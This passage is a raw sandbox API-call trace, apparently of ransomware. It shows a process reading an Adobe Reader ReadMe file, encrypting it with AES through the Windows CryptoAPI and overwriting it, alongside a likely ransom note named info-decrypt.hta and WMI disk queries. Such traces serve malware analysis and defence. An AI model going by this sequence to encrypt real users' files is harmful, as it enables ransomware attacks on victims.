GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm", lpFilePart=0x0) returned 0x36 [0206.739] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0206.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0206.739] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0206.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0206.739] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm", lpFilePart=0x0) returned 0x36 [0206.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0206.739] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerus.htm"), fInfoLevelId=0x0, lpFileInformation=0x3692a7c | out: lpFileInformation=0x3692a7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4872)) returned 1 [0206.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0206.740] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm", lpFilePart=0x0) returned 0x36 [0206.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0206.740] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerus.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a0 [0206.740] GetFileType (hFile=0x5a0) returned 0x1 [0206.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0206.740] GetFileType (hFile=0x5a0) returned 0x1 [0206.740] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x4872 [0206.740] ReadFile (in: hFile=0x5a0, lpBuffer=0x37943b4, nNumberOfBytesToRead=0x4872, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x37943b4*, lpNumberOfBytesRead=0x8f6eedc*=0x4872, lpOverlapped=0x0) returned 1 [0206.750] CloseHandle (hObject=0x5a0) returned 1 [0206.751] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xbe09c0) returned 1 [0206.752] CryptGenRandom (in: hProv=0xbe09c0, dwLen=0x10, pbBuffer=0x379af88 | out: pbBuffer=0x379af88) returned 1 [0207.290] CryptImportKey (in: hProv=0xbe09c0, pbData=0x39b1ec8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f510) returned 1 [0207.290] CryptContextAddRef (hProv=0xbe09c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.290] CryptContextAddRef (hProv=0xbe09c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.290] CryptDuplicateKey (in: hKey=0xb7f510, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7f4d0) returned 1 [0207.290] CryptContextAddRef (hProv=0xbe09c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0207.290] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x4, pbData=0x39b1fa8*=0x1, dwFlags=0x0) returned 1 [0207.290] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x1, pbData=0x39b1f74, dwFlags=0x0) returned 1 [0207.290] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39b1fb8*, pdwDataLen=0x8f6eea8*=0x4880, dwBufLen=0x4880 | out: pbData=0x39b1fb8*, pdwDataLen=0x8f6eea8*=0x4880) returned 1 [0207.291] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x39b685c*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x39b685c*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0207.292] CryptDestroyKey (hKey=0xb7f510) returned 1 [0207.292] CryptReleaseContext (hProv=0xbe09c0, dwFlags=0x0) returned 1 [0207.292] CryptReleaseContext (hProv=0xbe09c0, dwFlags=0x0) returned 1 [0207.292] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm", lpFilePart=0x0) returned 0x36 [0207.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0207.292] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerus.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0207.294] GetFileType (hFile=0x31c) returned 0x1 [0207.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0207.294] GetFileType (hFile=0x31c) returned 0x1 [0207.294] WriteFile (in: hFile=0x31c, lpBuffer=0x39b6e64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x39b6e64*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0207.296] CloseHandle (hObject=0x31c) returned 1 [0207.296] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0207.296] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0207.296] CoTaskMemFree (pv=0xbed438) [0207.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0207.297] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0207.297] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0207.297] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0207.297] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.298] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6027380) returned 0x0 [0207.298] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027380, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0207.298] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027380, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x602a290) returned 0x0 [0207.298] WbemDefPath:IUnknown:Release (This=0x6027380) returned 0x0 [0207.298] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a290, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x602a290) returned 0x0 [0207.298] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a290, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0207.299] WbemDefPath:IUnknown:AddRef (This=0x602a290) returned 0x3 [0207.299] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a290, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0207.299] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a290, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0207.299] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a290, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0xbdf1e0) returned 0x0 [0207.299] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf1e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0207.299] WbemDefPath:IUnknown:Release (This=0xbdf1e0) returned 0x3 [0207.299] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0207.299] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0207.299] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a290, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0207.299] WbemDefPath:IUnknown:Release (This=0x602a290) returned 0x2 [0207.299] WbemDefPath:IUnknown:Release (This=0x602a290) returned 0x1 [0207.299] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0207.299] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0207.299] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a290, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x602a290) returned 0x0 [0207.299] WbemDefPath:IUnknown:AddRef (This=0x602a290) returned 0x3 [0207.299] WbemDefPath:IUnknown:Release (This=0x602a290) returned 0x2 [0207.299] WbemDefPath:IWbemPath:SetText (This=0x602a290, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.299] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a290, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0207.299] WbemDefPath:IWbemPath:GetText (in: This=0x602a290, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0207.299] WbemDefPath:IWbemPath:GetText (in: This=0x602a290, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.299] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a290, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0207.299] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a290, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0207.299] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a290, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0207.299] WbemDefPath:IWbemPath:GetInfo (in: This=0x602a290, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0207.299] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a290, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0207.300] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0207.300] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0207.300] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.300] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0207.300] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0207.300] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0207.300] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.300] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6027430) returned 0x0 [0207.301] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027430, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0207.301] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027430, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x602a300) returned 0x0 [0207.301] WbemDefPath:IUnknown:Release (This=0x6027430) returned 0x0 [0207.301] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a300, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x602a300) returned 0x0 [0207.301] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a300, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0207.301] WbemDefPath:IUnknown:AddRef (This=0x602a300) returned 0x3 [0207.301] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a300, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0207.301] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a300, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0207.301] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a300, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0xbdf180) returned 0x0 [0207.301] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf180, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0207.301] WbemDefPath:IUnknown:Release (This=0xbdf180) returned 0x3 [0207.301] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0207.301] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0207.301] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a300, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0207.301] WbemDefPath:IUnknown:Release (This=0x602a300) returned 0x2 [0207.301] WbemDefPath:IUnknown:Release (This=0x602a300) returned 0x1 [0207.301] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0207.301] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0207.301] WbemDefPath:IUnknown:QueryInterface (in: This=0x602a300, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x602a300) returned 0x0 [0207.302] WbemDefPath:IUnknown:AddRef (This=0x602a300) returned 0x3 [0207.302] WbemDefPath:IUnknown:Release (This=0x602a300) returned 0x2 [0207.302] WbemDefPath:IWbemPath:SetText (This=0x602a300, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0207.302] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x602a300, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0207.302] WbemDefPath:IWbemPath:GetText (in: This=0x602a300, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0207.302] WbemDefPath:IWbemPath:GetText (in: This=0x602a300, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.302] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0207.302] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0207.302] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0207.302] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.303] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x6024d20) returned 0x0 [0207.303] WbemLocator:IUnknown:QueryInterface (in: This=0x6024d20, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0207.303] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024d20, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x6027440) returned 0x0 [0207.303] WbemLocator:IUnknown:Release (This=0x6024d20) returned 0x0 [0207.303] WbemLocator:IUnknown:QueryInterface (in: This=0x6027440, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x6027440) returned 0x0 [0207.303] WbemLocator:IUnknown:QueryInterface (in: This=0x6027440, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0207.303] WbemLocator:IUnknown:AddRef (This=0x6027440) returned 0x3 [0207.303] WbemLocator:IUnknown:QueryInterface (in: This=0x6027440, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0207.303] WbemLocator:IUnknown:QueryInterface (in: This=0x6027440, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0207.303] WbemLocator:IUnknown:QueryInterface (in: This=0x6027440, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0207.303] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0207.304] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0207.304] WbemLocator:IUnknown:QueryInterface (in: This=0x6027440, riid=0x74b4fb48*(Data1=0x144, 